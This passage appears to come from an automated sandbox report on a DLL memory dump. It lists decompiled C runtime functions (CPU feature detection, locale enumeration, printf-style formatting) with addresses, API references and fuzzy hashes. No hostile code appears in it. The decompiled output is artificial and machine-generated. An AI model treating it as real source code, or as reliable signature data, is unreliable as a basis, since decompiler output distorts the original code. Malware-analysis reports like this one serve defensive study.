TerminateProcess.KERNEL32(00000000,?,6E1ADF9F,?,00000001,?,?), ref: 6E1ADFC9
ExitProcess.KERNEL32 ref: 6E1ADFDB

Memory Dump Source

Source File: 00000001.00000002.645916064.000000006E191000.00000020.00020000.sdmp, Offset: 6E190000, based on PE: true

Associated: 00000001.00000002.645911367.000000006E190000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.645983742.000000006E204000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.646001738.000000006E212000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.646024059.000000006E232000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 68d10caf920582d1283db9aabd6f8d5c9d6e9ccb2bd0781be627910c2056a4fa
Instruction ID: bf3ca41190dfa2ebe5703c01474fc7c3f67e58dbfdfdaef6f7a537c4527e590f
Opcode Fuzzy Hash: 68d10caf920582d1283db9aabd6f8d5c9d6e9ccb2bd0781be627910c2056a4fa
Instruction Fuzzy Hash: 58E08C31005908AFCF026F98C80CAAD7F2AFF61259B118818FA0486660CB75DED3EB60

Uniqueness

Uniqueness Score: -1.00%

Function 6E19ACA6, Relevance: 1.6, APIs: 1, Instructions: 144
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E6E19ACA6(signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _t60;
				signed int _t61;
				signed int _t62;
				signed int _t63;
				signed int _t66;
				signed int _t67;
				signed int _t73;
				intOrPtr _t74;
				intOrPtr _t75;
				intOrPtr* _t77;
				signed int _t78;
				intOrPtr* _t82;
				signed int _t85;
				signed int _t90;
				intOrPtr* _t93;
				signed int _t96;
				signed int _t99;
				signed int _t104;

				_t90 = __edx;
				 *0x6e212fd8 =  *0x6e212fd8 & 0x00000000;
				 *0x6e212010 =  *0x6e212010 | 0x00000001;
				if(IsProcessorFeaturePresent(0xa) == 0) {
					L23:
					return 0;
				}
				_v20 = _v20 & 0x00000000;
				_push(_t74);
				_t93 =  &_v40;
				asm("cpuid");
				_t75 = _t74;
				 *_t93 = 0;
				 *((intOrPtr*)(_t93 + 4)) = _t74;
				 *((intOrPtr*)(_t93 + 8)) = 0;
				 *(_t93 + 0xc) = _t90;
				_v16 = _v40;
				_v12 = _v28 ^ 0x49656e69;
				_v8 = _v36 ^ 0x756e6547;
				_push(_t75);
				asm("cpuid");
				_t77 =  &_v40;
				 *_t77 = 1;
				 *((intOrPtr*)(_t77 + 4)) = _t75;
				 *((intOrPtr*)(_t77 + 8)) = 0;
				 *(_t77 + 0xc) = _t90;
				if((_v8 | _v32 ^ 0x6c65746e | _v12) != 0) {
					L9:
					_t96 =  *0x6e212fdc; // 0x2
					L10:
					_t85 = _v32;
					_t60 = 7;
					_v8 = _t85;
					if(_v16 < _t60) {
						_t78 = _v20;
					} else {
						_push(_t77);
						asm("cpuid");
						_t82 =  &_v40;
						 *_t82 = _t60;
						 *((intOrPtr*)(_t82 + 4)) = _t77;
						 *((intOrPtr*)(_t82 + 8)) = 0;
						_t85 = _v8;
						 *(_t82 + 0xc) = _t90;
						_t78 = _v36;
						if((_t78 & 0x00000200) != 0) {
							 *0x6e212fdc = _t96 | 0x00000002;
						}
					}
					_t61 =  *0x6e212010; // 0x6f
					_t62 = _t61 | 0x00000002;
					 *0x6e212fd8 = 1;
					 *0x6e212010 = _t62;
					if((_t85 & 0x00100000) != 0) {
						_t63 = _t62 | 0x00000004;
						 *0x6e212fd8 = 2;
						 *0x6e212010 = _t63;
						if((_t85 & 0x08000000) != 0 && (_t85 & 0x10000000) != 0) {
							asm("xgetbv");
							_v24 = _t63;
							_v20 = _t90;
							_t104 = 6;
							if((_v24 & _t104) == _t104) {
								_t66 =  *0x6e212010; // 0x6f
								_t67 = _t66 | 0x00000008;
								 *0x6e212fd8 = 3;
								 *0x6e212010 = _t67;
								if((_t78 & 0x00000020) != 0) {
									 *0x6e212fd8 = 5;
									 *0x6e212010 = _t67 | 0x00000020;
									if((_t78 & 0xd0030000) == 0xd0030000 && (_v24 & 0x000000e0) == 0xe0) {
										 *0x6e212010 =  *0x6e212010 | 0x00000040;
										 *0x6e212fd8 = _t104;
									}
								}
							}
						}
					}
					goto L23;
				}
				_t73 = _v40 & 0x0fff3ff0;
				if(_t73 == 0x106c0 || _t73 == 0x20660 || _t73 == 0x20670 || _t73 == 0x30650 || _t73 == 0x30660 || _t73 == 0x30670) {
					_t99 =  *0x6e212fdc; // 0x2
					_t96 = _t99 | 0x00000001;
					 *0x6e212fdc = _t96;
					goto L10;
				} else {
					goto L9;
				}
			}

0x6e19aca6
0x6e19aca9
0x6e19acb3
0x6e19acc3
0x6e19ae72
0x6e19ae75
0x6e19ae75
0x6e19acc9
0x6e19accf
0x6e19acd4
0x6e19acd8
0x6e19acdc
0x6e19acdd
0x6e19acdf
0x6e19ace2
0x6e19ace7
0x6e19acf0
0x6e19ad01
0x6e19ad0c
0x6e19ad12
0x6e19ad13
0x6e19ad18
0x6e19ad1b
0x6e19ad20
0x6e19ad28
0x6e19ad2b
0x6e19ad2e
0x6e19ad73
0x6e19ad73
0x6e19ad79
0x6e19ad79
0x6e19ad7e
0x6e19ad7f
0x6e19ad85
0x6e19adb6
0x6e19ad87
0x6e19ad89
0x6e19ad8a
0x6e19ad8f
0x6e19ad92
0x6e19ad94
0x6e19ad97
0x6e19ad9a
0x6e19ad9d
0x6e19ada0
0x6e19ada9
0x6e19adae
0x6e19adae
0x6e19ada9
0x6e19adb9
0x6e19adbe
0x6e19adc1
0x6e19adcb
0x6e19add6
0x6e19addc
0x6e19addf
0x6e19ade9
0x6e19adf4
0x6e19ae00
0x6e19ae03
0x6e19ae06
0x6e19ae11
0x6e19ae16
0x6e19ae18
0x6e19ae1d
0x6e19ae20
0x6e19ae2a
0x6e19ae32
0x6e19ae37
0x6e19ae41
0x6e19ae4f
0x6e19ae62
0x6e19ae69
0x6e19ae69
0x6e19ae4f
0x6e19ae32
0x6e19ae16
0x6e19adf4
0x00000000
0x6e19ae71
0x6e19ad33
0x6e19ad3d
0x6e19ad62
0x6e19ad68
0x6e19ad6b
0x00000000
0x00000000
0x00000000
0x00000000

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6E19ACBC

Memory Dump Source

Source File: 00000001.00000002.645916064.000000006E191000.00000020.00020000.sdmp, Offset: 6E190000, based on PE: true

Associated: 00000001.00000002.645911367.000000006E190000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.645983742.000000006E204000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.646001738.000000006E212000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.646024059.000000006E232000.00000002.00020000.sdmp Download File

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: a49df8f84a1e263f5f691e28ab17ec62dcd3a30bfb513da4253385a0439f9990
Instruction ID: 429b18e923a13eddb91ce64c12b8f8dc83c0c79b988b54765d2a615b9b39e705
Opcode Fuzzy Hash: a49df8f84a1e263f5f691e28ab17ec62dcd3a30bfb513da4253385a0439f9990
Instruction Fuzzy Hash: E751A0B2E006198FDB54CF94C4867DABBF2FB5A310F20852AD915EB240D775DA84EB60

Uniqueness

Uniqueness Score: -1.00%

Function 6E1B1154, Relevance: 1.5, APIs: 1, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E1B1154(void* __eflags) {
				intOrPtr _t17;
				signed int _t26;
				void* _t28;

				E6E19AAE0(0x6e210528, 0xc);
				 *(_t28 - 0x1c) =  *(_t28 - 0x1c) & 0x00000000;
				E6E1B6FDA( *((intOrPtr*)( *((intOrPtr*)(_t28 + 8)))));
				 *(_t28 - 4) =  *(_t28 - 4) & 0x00000000;
				 *0x6e2134d8 = E6E1AD741( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t28 + 0xc)))))));
				_t26 = EnumSystemLocalesW(E6E1B1147, 1);
				_t17 =  *0x6e212008; // 0xa172442e
				 *0x6e2134d8 = _t17;
				 *(_t28 - 0x1c) = _t26;
				 *(_t28 - 4) = 0xfffffffe;
				E6E1B11C4();
				 *[fs:0x0] =  *((intOrPtr*)(_t28 - 0x10));
				return _t26;
			}

0x6e1b115b
0x6e1b1160
0x6e1b1169
0x6e1b116f
0x6e1b1180
0x6e1b1192
0x6e1b1194
0x6e1b1199
0x6e1b119e
0x6e1b11a1
0x6e1b11a8
0x6e1b11b2
0x6e1b11be

APIs

Part of subcall function 6E1B6FDA: EnterCriticalSection.KERNEL32(-6E2136FF,?,6E1ADA95,00000000,6E210448,0000000C,6E1ADA5C,?,?,6E1B10DD,?,?,6E1B4310,00000001,00000364,00000009), ref: 6E1B6FE9

EnumSystemLocalesW.KERNEL32(Function_00021147,00000001,6E210528,0000000C), ref: 6E1B118C

Memory Dump Source

Source File: 00000001.00000002.645916064.000000006E191000.00000020.00020000.sdmp, Offset: 6E190000, based on PE: true

Associated: 00000001.00000002.645911367.000000006E190000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.645983742.000000006E204000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.646001738.000000006E212000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.646024059.000000006E232000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: 65be1cb948ac7d3c89aa67bc3bbb6ba1c642c8edf9fcbf5a76af7e3089b30ce5
Instruction ID: ed735823c479760b3dc21b7a87a04ce90d1344906d1da01a1699afd0e449ef53
Opcode Fuzzy Hash: 65be1cb948ac7d3c89aa67bc3bbb6ba1c642c8edf9fcbf5a76af7e3089b30ce5
Instruction Fuzzy Hash: 16F0A976A00204EFEB00DFE8C449BED7BF1FB1A328F10441AE6049B290CB755A84DF60

Uniqueness

Uniqueness Score: -1.00%

Function 6E1B1254, Relevance: 1.5, APIs: 1, Instructions: 14
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E1B1254(intOrPtr _a4) {
				int _t3;
				intOrPtr _t5;

				 *0x6e2134d8 = E6E1AD741(_a4);
				_t3 = EnumSystemLocalesW(E6E1B1147, 1);
				_t5 =  *0x6e212008; // 0xa172442e
				 *0x6e2134d8 = _t5;
				return _t3;
			}

0x6e1b1269
0x6e1b126e
0x6e1b1274
0x6e1b127a
0x6e1b1281

APIs

EnumSystemLocalesW.KERNEL32(Function_00021147,00000001), ref: 6E1B126E

Memory Dump Source

Source File: 00000001.00000002.645916064.000000006E191000.00000020.00020000.sdmp, Offset: 6E190000, based on PE: true

Associated: 00000001.00000002.645911367.000000006E190000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.645983742.000000006E204000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.646001738.000000006E212000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.646024059.000000006E232000.00000002.00020000.sdmp Download File

Similarity

API ID: EnumLocalesSystem
String ID:
API String ID: 2099609381-0
Opcode ID: e9682201a7335e0c06ec5c76fa00b9ff44a8f77f97395f3c4e267dcf1c985e38
Instruction ID: 40e1e2673f5a2a97f2666e5214265a52fe72b5b33ae8dd2fd96fef11074ccbac
Opcode Fuzzy Hash: e9682201a7335e0c06ec5c76fa00b9ff44a8f77f97395f3c4e267dcf1c985e38
Instruction Fuzzy Hash: FAD09E755447046BEF055B91D88E9A53F57E792768B110019FA0C07640DE7259C1DA64

Uniqueness

Uniqueness Score: -1.00%

Function 6E1AA57C, Relevance: 1.5, Strings: 1, Instructions: 243
COMMONCrypto

Download Yara Rule

C-Code - Quality: 80%

			E6E1AA57C(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				short _v12;
				short _v16;
				signed int _v20;
				short _v24;
				signed int _t57;
				signed int _t59;
				signed int _t60;
				void* _t61;
				signed int _t62;
				signed char _t66;
				signed char _t68;
				signed int _t69;
				short _t71;
				void* _t72;
				signed char _t78;
				signed char _t81;
				void* _t86;
				void* _t87;
				signed char _t89;
				signed char _t91;
				short _t92;
				signed int _t95;
				signed int _t97;
				signed int _t98;
				unsigned int _t103;
				signed int _t104;
				void* _t107;
				void* _t108;
				void* _t110;
				signed int _t115;
				unsigned int _t117;
				signed int* _t119;
				signed char _t120;
				void* _t128;
				signed int _t131;
				void* _t132;
				short _t133;
				short _t134;
				void* _t135;
				intOrPtr* _t138;
				signed int _t139;
				void* _t140;
				void* _t142;
				void* _t143;

				_t132 = __edi;
				_t57 =  *0x6e212008; // 0xa172442e
				_v8 = _t57 ^ _t139;
				_t138 = __ecx;
				_t128 = 0x41;
				_t59 =  *(__ecx + 0x32) & 0x0000ffff;
				_t110 = 0x58;
				_t142 = _t59 - 0x64;
				if(_t142 > 0) {
					__eflags = _t59 - 0x70;
					if(__eflags > 0) {
						_t60 = _t59 - 0x73;
						__eflags = _t60;
						if(_t60 == 0) {
							L9:
							_t61 = E6E1AC2D4(_t138);
							L10:
							if(_t61 != 0) {
								_t62 = E6E1A8AE4(_t138);
								__eflags = _t62;
								if(_t62 != 0) {
									L71:
									L72:
									return E6E199EE7(_v8 ^ _t139);
								}
								__eflags =  *(_t138 + 0x30);
								if( *(_t138 + 0x30) != 0) {
									goto L71;
								}
								_t115 = 0;
								_v16 = 0;
								_v12 = 0;
								_t103 =  *(_t138 + 0x20);
								_push(_t132);
								_v20 = 0;
								_t66 = _t103 >> 4;
								_t133 = 0x20;
								__eflags = 1 & _t66;
								if((1 & _t66) == 0) {
									L47:
									_t131 =  *(_t138 + 0x32) & 0x0000ffff;
									_t134 = 0x78;
									__eflags = _t131 - _t134;
									if(_t131 == _t134) {
										L49:
										_t68 = _t103 >> 5;
										__eflags = _t68 & 0x00000001;
										if((_t68 & 0x00000001) == 0) {
											L51:
											_t104 = 0;
											__eflags = 0;
											L52:
											__eflags = _t131 - 0x61;
											if(_t131 == 0x61) {
												L55:
												_t69 = 1;
												L56:
												_v24 = 0x30;
												__eflags = _t104;
												if(_t104 != 0) {
													L58:
													 *((short*)(_t139 + _t115 * 2 - 0xc)) = _v24;
													_t71 = 0x58;
													__eflags = _t131 - _t71;
													if(_t131 == _t71) {
														L60:
														_t134 = _t71;
														L61:
														 *((short*)(_t139 + _t115 * 2 - 0xa)) = _t134;
														_t115 = _t115 + 2;
														__eflags = _t115;
														_v20 = _t115;
														L62:
														_t72 = _t138 + 0x18;
														_t135 = _t138 + 0x448;
														_t107 =  *((intOrPtr*)(_t138 + 0x24)) -  *((intOrPtr*)(_t138 + 0x38)) - _t115;
														__eflags =  *(_t138 + 0x20) & 0x0000000c;
														if(( *(_t138 + 0x20) & 0x0000000c) == 0) {
															E6E1A6E88(_t135, 0x20, _t107, _t72);
															_t115 = _v20;
															_t140 = _t140 + 0x10;
														}
														_push(_t138 + 0xc);
														E6E1ACF82(_t135,  &_v16, _t115, _t138 + 0x18);
														_t117 =  *(_t138 + 0x20);
														_t78 = _t117 >> 3;
														__eflags = _t78 & 0x00000001;
														if((_t78 & 0x00000001) != 0) {
															_t120 = _t117 >> 2;
															__eflags = _t120 & 0x00000001;
															if((_t120 & 0x00000001) == 0) {
																E6E1A6E88(_t135, _v24, _t107, _t138 + 0x18);
																_t140 = _t140 + 0x10;
															}
														}
														E6E1ACE30(_t138, _t131, 0);
														_t119 = _t138 + 0x18;
														__eflags =  *_t119;
														if( *_t119 >= 0) {
															_t81 =  *(_t138 + 0x20) >> 2;
															__eflags = _t81 & 0x00000001;
															if((_t81 & 0x00000001) != 0) {
																E6E1A6E88(_t135, 0x20, _t107, _t119);
															}
														}
														goto L71;
													}
													_t108 = 0x41;
													__eflags = _t131 - _t108;
													if(_t131 != _t108) {
														goto L61;
													}
													goto L60;
												}
												__eflags = _t69;
												if(_t69 == 0) {
													goto L62;
												}
												goto L58;
											}
											_t86 = 0x41;
											__eflags = _t131 - _t86;
											if(_t131 == _t86) {
												goto L55;
											}
											_t69 = 0;
											goto L56;
										}
										_t104 = 1;
										goto L52;
									}
									_t87 = 0x58;
									__eflags = _t131 - _t87;
									if(_t131 != _t87) {
										goto L51;
									}
									goto L49;
								}
								_t89 = _t103 >> 6;
								__eflags = 1 & _t89;
								if((1 & _t89) == 0) {
									__eflags = 1 & _t103;
									if((1 & _t103) == 0) {
										_t91 = _t103 >> 1;
										__eflags = 1 & _t91;
										if((1 & _t91) != 0) {
											_v16 = _t133;
											_t115 = 1;
											_v20 = 1;
										}
										goto L47;
									}
									_push(0x2b);
									L44:
									_pop(_t92);
									_t115 = 1;
									_v16 = _t92;
									_v20 = 1;
									goto L47;
								}
								_push(0x2d);
								goto L44;
							}
							L11:
							goto L72;
						}
						_t95 = _t60;
						__eflags = _t95;
						if(__eflags == 0) {
							L29:
							_push(0);
							_push(0xa);
							L30:
							_t61 = E6E1ABD6F(_t138, __eflags);
							goto L10;
						}
						__eflags = _t95 - 3;
						if(__eflags != 0) {
							goto L11;
						}
						_push(0);
						L13:
						_push(0x10);
						goto L30;
					}
					if(__eflags == 0) {
						_t61 = E6E1AC15A(__ecx);
						goto L10;
					}
					__eflags = _t59 - 0x65;
					if(_t59 < 0x65) {
						goto L11;
					}
					__eflags = _t59 - 0x67;
					if(_t59 <= 0x67) {
						L31:
						_t61 = E6E1AB4CE(_t138);
						goto L10;
					}
					__eflags = _t59 - 0x69;
					if(_t59 == 0x69) {
						L28:
						_t3 = _t138 + 0x20;
						 *_t3 =  *(_t138 + 0x20) | 0x00000010;
						__eflags =  *_t3;
						goto L29;
					}
					__eflags = _t59 - 0x6e;
					if(_t59 == 0x6e) {
						_t61 = E6E1ABFFF(__ecx, _t128);
						goto L10;
					}
					__eflags = _t59 - 0x6f;
					if(_t59 != 0x6f) {
						goto L11;
					}
					_t61 = E6E1AC0F3(__ecx);
					goto L10;
				}
				if(_t142 == 0) {
					goto L28;
				}
				_t143 = _t59 - _t110;
				if(_t143 > 0) {
					_t97 = _t59 - 0x5a;
					__eflags = _t97;
					if(_t97 == 0) {
						_t61 = E6E1AAFC7(0, __ecx);
						goto L10;
					}
					_t98 = _t97 - 7;
					__eflags = _t98;
					if(_t98 == 0) {
						goto L31;
					}
					__eflags = _t98 != 0;
					if(_t98 != 0) {
						goto L11;
					}
					L17:
					_t61 = E6E1AB863(_t138, _t128, 0);
					goto L10;
				}
				if(_t143 == 0) {
					_push(1);
					goto L13;
				}
				if(_t59 == _t128) {
					goto L31;
				}
				if(_t59 == 0x43) {
					goto L17;
				}
				if(_t59 <= 0x44) {
					goto L11;
				}
				if(_t59 <= 0x47) {
					goto L31;
				}
				if(_t59 != 0x53) {
					goto L11;
				}
				goto L9;
			}

0x6e1aa57c
0x6e1aa584
0x6e1aa58b
0x6e1aa590
0x6e1aa596
0x6e1aa599
0x6e1aa59d
0x6e1aa59e
0x6e1aa5a1
0x6e1aa60e
0x6e1aa611
0x6e1aa668
0x6e1aa668
0x6e1aa66b
0x6e1aa5cf
0x6e1aa5d1
0x6e1aa5d6
0x6e1aa5d8
0x6e1aa688
0x6e1aa68d
0x6e1aa68f
0x6e1aa7e0
0x6e1aa7e2
0x6e1aa7ef
0x6e1aa7ef
0x6e1aa695
0x6e1aa698
0x00000000
0x00000000
0x6e1aa69e
0x6e1aa6a0
0x6e1aa6a3
0x6e1aa6a9
0x6e1aa6ad
0x6e1aa6b0
0x6e1aa6b3
0x6e1aa6b8
0x6e1aa6b9
0x6e1aa6bb
0x6e1aa6ed
0x6e1aa6ed
0x6e1aa6f3
0x6e1aa6f4
0x6e1aa6f7
0x6e1aa701
0x6e1aa703
0x6e1aa706
0x6e1aa708
0x6e1aa70e
0x6e1aa70e
0x6e1aa70e
0x6e1aa710
0x6e1aa710
0x6e1aa713
0x6e1aa721
0x6e1aa721
0x6e1aa723
0x6e1aa723
0x6e1aa72a
0x6e1aa72c
0x6e1aa732
0x6e1aa737
0x6e1aa73c
0x6e1aa73d
0x6e1aa740
0x6e1aa74a
0x6e1aa74a
0x6e1aa74c
0x6e1aa74c
0x6e1aa751
0x6e1aa751
0x6e1aa754
0x6e1aa757
0x6e1aa75a
0x6e1aa760
0x6e1aa766
0x6e1aa768
0x6e1aa76c
0x6e1aa773
0x6e1aa778
0x6e1aa77b
0x6e1aa77b
0x6e1aa781
0x6e1aa78d
0x6e1aa792
0x6e1aa797
0x6e1aa79a
0x6e1aa79c
0x6e1aa79e
0x6e1aa7a1
0x6e1aa7a4
0x6e1aa7af
0x6e1aa7b4
0x6e1aa7b4
0x6e1aa7a4
0x6e1aa7bb
0x6e1aa7c0
0x6e1aa7c3
0x6e1aa7c6
0x6e1aa7cb
0x6e1aa7ce
0x6e1aa7d0
0x6e1aa7d7
0x6e1aa7dc
0x6e1aa7d0
0x00000000
0x6e1aa7df
0x6e1aa744
0x6e1aa745
0x6e1aa748
0x00000000
0x00000000
0x00000000
0x6e1aa748
0x6e1aa72e
0x6e1aa730
0x00000000
0x00000000
0x00000000
0x6e1aa730
0x6e1aa717
0x6e1aa718
0x6e1aa71b
0x00000000
0x00000000
0x6e1aa71d
0x00000000
0x6e1aa71d
0x6e1aa70a
0x00000000
0x6e1aa70a
0x6e1aa6fb
0x6e1aa6fc
0x6e1aa6ff
0x00000000
0x00000000
0x00000000
0x6e1aa6ff
0x6e1aa6bf
0x6e1aa6c2
0x6e1aa6c4
0x6e1aa6ca
0x6e1aa6cc
0x6e1aa6de
0x6e1aa6e0
0x6e1aa6e2
0x6e1aa6e4
0x6e1aa6e8
0x6e1aa6ea
0x6e1aa6ea
0x00000000
0x6e1aa6e2
0x6e1aa6ce
0x6e1aa6d0
0x6e1aa6d0
0x6e1aa6d1
0x6e1aa6d3
0x6e1aa6d7
0x00000000
0x6e1aa6d7
0x6e1aa6c6
0x00000000
0x6e1aa6c6
0x6e1aa5de
0x00000000
0x6e1aa5de
0x6e1aa672
0x6e1aa672
0x6e1aa675
0x6e1aa644
0x6e1aa644
0x6e1aa645
0x6e1aa647
0x6e1aa649
0x00000000
0x6e1aa649
0x6e1aa677
0x6e1aa67a
0x00000000
0x00000000
0x6e1aa680
0x6e1aa5e7
0x6e1aa5e7
0x00000000
0x6e1aa5e7
0x6e1aa613
0x6e1aa65e
0x00000000
0x6e1aa65e
0x6e1aa615
0x6e1aa618
0x00000000
0x00000000
0x6e1aa61a
0x6e1aa61d
0x6e1aa650
0x6e1aa652
0x00000000
0x6e1aa652
0x6e1aa61f
0x6e1aa622
0x6e1aa640
0x6e1aa640
0x6e1aa640
0x6e1aa640
0x00000000
0x6e1aa640
0x6e1aa624
0x6e1aa627
0x6e1aa639
0x00000000
0x6e1aa639
0x6e1aa629
0x6e1aa62c
0x00000000
0x00000000
0x6e1aa630
0x00000000
0x6e1aa630
0x6e1aa5a3
0x00000000
0x00000000
0x6e1aa5a9
0x6e1aa5ab
0x6e1aa5eb
0x6e1aa5eb
0x6e1aa5ee
0x6e1aa607
0x00000000
0x6e1aa607
0x6e1aa5f0
0x6e1aa5f0
0x6e1aa5f3
0x00000000
0x00000000
0x6e1aa5f6
0x6e1aa5f9
0x00000000
0x00000000
0x6e1aa5fb
0x6e1aa5fe
0x00000000
0x6e1aa5fe
0x6e1aa5ad
0x6e1aa5e5
0x00000000
0x6e1aa5e5
0x6e1aa5b1
0x00000000
0x00000000
0x6e1aa5ba
0x00000000
0x00000000
0x6e1aa5bf
0x00000000
0x00000000
0x6e1aa5c4
0x00000000
0x00000000
0x6e1aa5cd
0x00000000
0x00000000
0x00000000

Strings

0, xrefs: 6E1AA723

Memory Dump Source

Source File: 00000001.00000002.645916064.000000006E191000.00000020.00020000.sdmp, Offset: 6E190000, based on PE: true

Associated: 00000001.00000002.645911367.000000006E190000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.645983742.000000006E204000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.646001738.000000006E212000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.646024059.000000006E232000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 77a1f09793ce81a4b5c1f81dd2b55ff5594008a21eed0ee98ff599cf07b6ecdf
Instruction ID: ae95d40c9b43501974d9a077e842c1b1ef6d9d6ca9cce3c3423df04dda5d74b5
Opcode Fuzzy Hash: 77a1f09793ce81a4b5c1f81dd2b55ff5594008a21eed0ee98ff599cf07b6ecdf
Instruction Fuzzy Hash: 3E618CBC24020A5BDB54DEEC44A07BF73B5AF21304F20081DD7599B680EB22DDC6B745

Uniqueness

Uniqueness Score: -1.00%

Function 6E1AAA55, Relevance: 1.5, Strings: 1, Instructions: 243
COMMONCrypto

Download Yara Rule

C-Code - Quality: 83%

			E6E1AAA55(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				short _v12;
				short _v16;
				signed int _v20;
				short _v24;
				signed int _t57;
				signed int _t59;
				signed int _t60;
				void* _t61;
				signed int _t62;
				signed char _t66;
				signed char _t68;
				signed int _t69;
				short _t71;
				void* _t72;
				signed char _t78;
				signed char _t81;
				void* _t86;
				void* _t87;
				signed char _t89;
				signed char _t91;
				short _t92;
				signed int _t95;
				signed int _t97;
				signed int _t98;
				unsigned int _t103;
				signed int _t104;
				void* _t107;
				void* _t108;
				void* _t110;
				signed int _t115;
				unsigned int _t117;
				signed int* _t119;
				signed char _t120;
				void* _t128;
				signed int _t131;
				void* _t132;
				short _t133;
				short _t134;
				void* _t135;
				intOrPtr* _t138;
				signed int _t139;
				void* _t140;
				void* _t142;
				void* _t143;

				_t132 = __edi;
				_t57 =  *0x6e212008; // 0xa172442e
				_v8 = _t57 ^ _t139;
				_t138 = __ecx;
				_t128 = 0x41;
				_t59 =  *(__ecx + 0x32) & 0x0000ffff;
				_t110 = 0x58;
				_t142 = _t59 - 0x64;
				if(_t142 > 0) {
					__eflags = _t59 - 0x70;
					if(__eflags > 0) {
						_t60 = _t59 - 0x73;
						__eflags = _t60;
						if(_t60 == 0) {
							L9:
							_t61 = E6E1AC2D4(_t138);
							L10:
							if(_t61 != 0) {
								_t62 = E6E1A8AE4(_t138);
								__eflags = _t62;
								if(_t62 != 0) {
									L71:
									L72:
									return E6E199EE7(_v8 ^ _t139);
								}
								__eflags =  *(_t138 + 0x30);
								if( *(_t138 + 0x30) != 0) {
									goto L71;
								}
								_t115 = 0;
								_v16 = 0;
								_v12 = 0;
								_t103 =  *(_t138 + 0x20);
								_push(_t132);
								_v20 = 0;
								_t66 = _t103 >> 4;
								_t133 = 0x20;
								__eflags = 1 & _t66;
								if((1 & _t66) == 0) {
									L47:
									_t131 =  *(_t138 + 0x32) & 0x0000ffff;
									_t134 = 0x78;
									__eflags = _t131 - _t134;
									if(_t131 == _t134) {
										L49:
										_t68 = _t103 >> 5;
										__eflags = _t68 & 0x00000001;
										if((_t68 & 0x00000001) == 0) {
											L51:
											_t104 = 0;
											__eflags = 0;
											L52:
											__eflags = _t131 - 0x61;
											if(_t131 == 0x61) {
												L55:
												_t69 = 1;
												L56:
												_v24 = 0x30;
												__eflags = _t104;
												if(_t104 != 0) {
													L58:
													 *((short*)(_t139 + _t115 * 2 - 0xc)) = _v24;
													_t71 = 0x58;
													__eflags = _t131 - _t71;
													if(_t131 == _t71) {
														L60:
														_t134 = _t71;
														L61:
														 *((short*)(_t139 + _t115 * 2 - 0xa)) = _t134;
														_t115 = _t115 + 2;
														__eflags = _t115;
														_v20 = _t115;
														L62:
														_t72 = _t138 + 0x18;
														_t135 = _t138 + 0x448;
														_t107 =  *((intOrPtr*)(_t138 + 0x24)) -  *((intOrPtr*)(_t138 + 0x38)) - _t115;
														__eflags =  *(_t138 + 0x20) & 0x0000000c;
														if(( *(_t138 + 0x20) & 0x0000000c) == 0) {
															E6E1A6EF4(_t135, 0x20, _t107, _t72);
															_t115 = _v20;
															_t140 = _t140 + 0x10;
														}
														_push(_t138 + 0xc);
														E6E1AD015(_t135,  &_v16, _t115, _t138 + 0x18);
														_t117 =  *(_t138 + 0x20);
														_t78 = _t117 >> 3;
														__eflags = _t78 & 0x00000001;
														if((_t78 & 0x00000001) != 0) {
															_t120 = _t117 >> 2;
															__eflags = _t120 & 0x00000001;
															if((_t120 & 0x00000001) == 0) {
																E6E1A6EF4(_t135, _v24, _t107, _t138 + 0x18);
																_t140 = _t140 + 0x10;
															}
														}
														E6E1ACEC3(_t138, _t131, 0);
														_t119 = _t138 + 0x18;
														__eflags =  *_t119;
														if( *_t119 >= 0) {
															_t81 =  *(_t138 + 0x20) >> 2;
															__eflags = _t81 & 0x00000001;
															if((_t81 & 0x00000001) != 0) {
																E6E1A6EF4(_t135, 0x20, _t107, _t119);
															}
														}
														goto L71;
													}
													_t108 = 0x41;
													__eflags = _t131 - _t108;
													if(_t131 != _t108) {
														goto L61;
													}
													goto L60;
												}
												__eflags = _t69;
												if(_t69 == 0) {
													goto L62;
												}
												goto L58;
											}
											_t86 = 0x41;
											__eflags = _t131 - _t86;
											if(_t131 == _t86) {
												goto L55;
											}
											_t69 = 0;
											goto L56;
										}
										_t104 = 1;
										goto L52;
									}
									_t87 = 0x58;
									__eflags = _t131 - _t87;
									if(_t131 != _t87) {
										goto L51;
									}
									goto L49;
								}
								_t89 = _t103 >> 6;
								__eflags = 1 & _t89;
								if((1 & _t89) == 0) {
									__eflags = 1 & _t103;
									if((1 & _t103) == 0) {
										_t91 = _t103 >> 1;
										__eflags = 1 & _t91;
										if((1 & _t91) != 0) {
											_v16 = _t133;
											_t115 = 1;
											_v20 = 1;
										}
										goto L47;
									}
									_push(0x2b);
									L44:
									_pop(_t92);
									_t115 = 1;
									_v16 = _t92;
									_v20 = 1;
									goto L47;
								}
